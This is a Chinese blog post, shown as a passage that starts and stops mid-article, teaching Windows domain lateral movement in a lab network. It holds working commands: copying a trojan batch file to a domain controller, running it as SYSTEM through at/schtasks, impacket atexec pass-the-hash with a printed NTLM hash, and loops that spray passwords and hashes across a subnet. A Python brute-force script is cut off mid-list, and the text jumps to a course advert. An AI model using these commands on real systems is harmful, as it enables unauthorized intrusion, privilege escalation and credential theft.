2024年内网渗透-at&schtasks_at拒绝访问

于 2024-05-01 04:21:22 发布
阅读量365 收藏 12
点赞数 16
分类专栏: 程序员 文章标签: 网络 前端 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82242964/article/details/138363211
版权

(6)1326:账号密码错误

(7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况

(8)2242:用户密码过期,目标有账号策略,强制定期更改密码

2、拷贝要执行的命令脚本到域控

dir \\192.168.139.128\C$\    #查看域控c盘目录
copy C:\muma.bat \\192.168.139.128\C$    #复制文件到域控

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ChIfmCru-1666782771967)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402183539779.png)]

3、查看目标时间,定时任务(at&schtasks)

net time /domain     #查看域控时间
at \\192.168.139.128 18:40 C:\muma.bat   #系统小于windows2012
schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn adduser /sc DAILY /tr C:\muma.bat /F #系统大于等于windows2012 创建adduser对应执行文件
schtasks /run /s 192.168.139.128 /tn adduser /i  #运行adduser任务

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nwqcQgnw-1666782771968)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402185723553.png)]

4、删除计划任务

schtasks /delete /s 192.168.139.128 /tn adduser /f #删除adduser任务

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yv1r6juD-1666782771968)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402190014138.png)]

三、域横向渗透明文HASH传递atexec-impacket

1、使用atexec明文

先删除之前的ipc连接

net use \\192.168.139.128 /del

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VwEKjir6-1666782771969)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402190831235.png)]

使用atexec传递明文

atexec.exe 目标用户名:密码@目标ip "执行的命令”
atexec.exe administrator:admin.root.123@192.168.139.128 "whoami"    #工作组
atexec.exe GHY/administrator:admin.root.123@192.168.139.128 "whoami"  #域

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HJgewCN0-1666782771970)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402191528572.png)]

自动提权到SYSTEM

2、使用atexec 进行传递HASH

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VvIsd35o-1666782771971)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220406092225030.png)]

NTLM:09731bc87db0aeb71e040f42978b3de1
atexec.exe -hashes :09731bc87db0aeb71e040f42978b3de1 ./administrator@192.168.139.128 "whoami"
atexec.exe -hashes :09731bc87db0aeb71e040f42978b3de1 GHY/administrator@192.168.139.128 "whoami"
#空格不能少!!!!

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KrYhU83l-1666782771971)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220406092034994.png)]

四、批量利用

批量获取域内存活ip

for /L %i in (1,1,254) do @ping -w 1 -n 1 192.168.139.%i | findstr "TTL="

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2wcp21P1-1666782771972)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402200639098.png)]

批量检测ipc

for /F %i in (ips.txt) do net use \\%i\ipc$ "admin.root.123" /user:administrator  #批量检测ip对应的明文连接(工作组)
for /F %i in (ips.txt) do net use \\%i\ipc$ "admin.root.123" /user:GHY\administrator
#批量检测ip对应的明文连接(域)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-arlzJD8t-1666782771972)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402202637032.png)]

for /F %i in (ips.txt) do atexec.exe ./administrator:admin.root.123@%i "whoami" #批量检测ip对应明文回显版(工作组)
for /F %i in (ips.txt) do atexec.exe GHY/administrator:admin.root.123@%i "whoami"
#批量检测ip对应的明文回显版(域)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EtgOGbrV-1666782771973)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220405185658067.png)]

for /F %i in (pass.txt) do atexec.exe ./administrator:%i@192.168.139.128 "whoami" 
#批量检测明文对应ip回显版(工作组)
for /F %u in (pass.txt) do atexec.exe GHY/administrator:%i@192.168.139.128 "whoami"
#批量检测明文对应ip回显版(域)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PoFtfCqD-1666782771973)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220405190612253.png)]

for /F %i in (hash.txt) do atexec.exe -hashes :%i ./administrator@192.168.139.128 "whoami"
#批量检测hash对应ip回显版(工作组)
for /F %i in (hash.txt) do atexec.exe -hashes :%i GHY/administrator@192.168.139.128 "whoami"
#批量检测hash对应的ip回显版(域)

image-20220406092535541

五、整体批量化

#net user \\192.168.139.128\ipc$ "admin.root.123" /user:GHY\administrator
#pip install pyinstaller
#pyinstaller -F ipc.py
import os,time

ipc={
    '192.168.139.1',
    '192.168.139.2',
    '192.168.139.128',
    '192.168.139.131',
    '192.168.139.133'
}

passw={
    'ghy00925',
    'ghy.root',
    'ghy.root.234',


## 学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2301_82242964
关注
  • 16
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
操作系统的system权限
09-29
用法: 先结束 pv.exe -k -f explorer.exe PAUSE 再运行 PsExec.exe -i -d -s explorer.exe 文件: pv.exe 大小: 61440 字节 修改时间: 20032月2日, 1:33:58 MD5: A98E0F4EAF8260CA5190B0D247A7896A SHA1: EAED5E313E08E9D3CEB3937F0DDC128300BF2400 CRC32: F806624C 文件: psexec.exe 大小: 234536 字节 文件版本: 1.86 修改时间: 20079月24日, 9:23:08 MD5: CEBB4A43CDA265B1F0D0118CF02C3CB2 SHA1: 79DEB80DD1ECAFFF197A522E51AD5900B62D3639 CRC32: 0745F064
第66天:内网安全-域横向批量at&schtasks&impacket1
08-03
1. 建立 IPC 链接到目标主机 2. 拷贝要执行的命令脚本到目标主机 3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本 4.
内网渗透-at&schtasks
G208_522的博客
10-26 1661
内网渗透系列
SCHTASKS /RUN 提示拒绝访问解决措施
mijia5714
04-26 5596
SCHTASKS 执行远程主机的计划任务提示拒绝访问一般由两个因素:1.登录用户没有权限。2.组策略设置不得当。 建议用administrator账户登录,并且更改本地组策略:运行gpedit.msc ——计算机配置——Windows设置——安全设置——本地策略 ——安全选项——用户账户控制:以管理员批准模式运行所有管理员——禁用。 ...
schtasks /run 拒绝访问
法海爱捉虫
08-30 2643
以管理员运行CMD gpedit.msc 再次执行,。。。OK!!!
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-21
内网安全攻防是网络安全领域的重要组成部分,尤其对于企业、政府机构等组织来说,保护内网安全至关重要,因为内网通常存储着敏感信息和关键业务数据。本文主要围绕内网安全中的攻防策略,特别是通过Windows系统中的...
windows下常用排查命令-2021_2_241
08-08
3. 删除任务计划:`SchTasks /Delete /TN 任务计划名称`,需要以管理员权限运行。 五、查看系统服务 1. `Services.msc`: 打开服务管理控制台,查看和管理所有服务。 2. 命令行操作服务:`sc stop [服务名称]`停止...
schtasks详解
02-26
schtasks详解,具体到每个每天,每月,工作日等设置。
schtasks.exe
01-10
schtasks
windows 命令
齐枫的博客
05-27 2044
dir 显示目录 cd 切换目录 rd/s/q 盘符:\某个文件夹 (强制删除文件文件夹和文件夹内所有文件) del/f/s/q 盘符:\文件名 (强制删除文件,文件名必须加文件后缀名)...
schtasks
编程岁月
05-14 707
 schtasks /Change /S Sle-ccalg-001 /TN prod_retrieve_corp_shb /DISABLE schtasks /query /S Sle-ccalg-001 /TN prod_retrieve_corp_shb
使用Schtasks命令的注意事项
weixin_30627341的博客
07-17 494
在使用Schtasks命令时遇到了两个棘手的问题,耗费了一点时间,出现这个问题的时候查找网络资源也找不到真正的解决方案,最后还是自己悟出来了原因,所以在此把这些问题记录下来。如下: 服务器环境:windows server 2008 r2。在本机(\\servername)执行命令schtasks /query /tn "taskname" /fo LIST /v /s \\serv...
内网渗透-域横向批量AT-Schtsks
weixin_60329395的博客
07-30 555
当拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机呢?这里仅介绍AT&Schtasks命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。...
AT绑定句柄无效和拒绝访问
Yubikiri的博客
09-29 3869
绑定句柄无效使用at命令
内网安全-域横向批量at&schtasks&impacket
m0_61506558的博客
10-22 1071
获取到某域主机权限-> minikatz得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做字典->尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令。在3中都是批处理命令,只能遍历一个变量,如果想要遍历多个变量,比如IP、用户名、密码等,可以写python脚本,免杀,使用Pyinstaller打包成exe文件,上传到目标机器运行。命令的使用,在已知目标系统的用户明文密码的基础上,直接可在远程主机上执行命令。建立IPC常见的错误代码。
Windows Server 2012 Active Directory 域控查询总结
cmh229的博客
03-21 1246
根据设定场景进行AD域控信息的查询
$IPC、Psexec、WMI、Schtasks、AT、SC、WINRM
最新发布
04-17
Schtasks类似,AT也可以用于在指定的时间或事件发生时自动执行任务。 SC(Service Control)是Windows操作系统中的一个命令行工具,用于管理Windows服务。通过SC,管理员可以启动、停止、暂停、继续、查询和修改...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值